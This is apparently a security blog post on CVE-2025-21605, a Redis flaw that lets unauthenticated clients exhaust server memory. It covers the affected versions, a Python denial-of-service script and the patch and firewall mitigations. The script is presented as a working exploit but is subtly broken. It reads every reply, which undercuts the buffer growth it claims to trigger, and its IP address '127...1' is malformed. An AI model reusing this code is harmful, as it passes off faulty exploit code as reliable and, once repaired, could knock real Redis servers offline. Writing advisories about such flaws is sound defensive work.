CVE-2025-21605 - Unauthenticated Clients Trigger Memory Exhaustion in Redis 2.6 to 7.4.2

Redis (Remote Dictionary Server) is an open-source, in-memory data structure store that can be used as a database, cache, and message broker. It is commonly used as a caching layer for web applications due to its ability to store key-value pairs in memory for fast access. The Redis project has recently acknowledged a vulnerability in their software that allows unauthenticated clients to trigger memory exhaustion, causing a denial of service condition in affected servers.

This post will discuss the CVE-2025-21605 vulnerability, its impact, and the available patches and workarounds to secure your Redis deployment.

Vulnerability Details

In Redis versions starting at 2.6 and prior to 7.4.3, there is a vulnerability that allows unauthenticated clients to cause the output buffers to grow unlimitedly, eventually exhausting the server's memory and causing a denial of service. The default Redis configuration does not limit the output buffer of normal clients, which leads to the unlimited growth of the output buffer.

When password authentication is enabled on the Redis server, but no password is provided, the clients can still cause the output buffer to grow due to "NOAUTH" responses.

The vulnerability has been assigned the identifier CVE-2025-21605 and has been patched in version 7.4.3.

Here is a code snippet demonstrating the vulnerability

import socket

def exploit_redis(ip, port):
    while True:
        try:
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.connect((ip, port))
            sock.sendall(b'ping\r\n')  # any unauthenticated command will cause the output buffer to grow
            response = sock.recv(1024)
            print(response)
        except socket.error:
            break

ip = "127...1"
port = 6379
exploit_redis(ip, port)

Mitigation and Patching

Redis has released a patch for this issue in version 7.4.3. Users are advised to upgrade their Redis installation to the latest version to protect against this vulnerability.

If upgrading is not feasible, there is a workaround to mitigate this vulnerability without patching the redis-server executable. You can block unauthenticated users from connecting to Redis by implementing network access controls. This can be achieved using tools such as firewalls, iptables, security groups, or by enabling TLS and requiring users to authenticate using client-side certificates.

Original References

- Redis Security Page
- CVE-2025-21605 Details
- Redis 7.4.3 Release Notes

Conclusion

CVE-2025-21605 is a critical vulnerability affecting Redis servers from version 2.6 to 7.4.2, allowing unauthenticated clients to cause a denial of service through memory exhaustion. It is important to upgrade to Redis 7.4.3 or implement the suggested workarounds to secure your Redis deployment against this issue.

Keep your systems up to date and monitor the security news and advisories for any further updates on this and other related vulnerabilities!

Timeline

Published on: 04/23/2025 16:15:34 UTC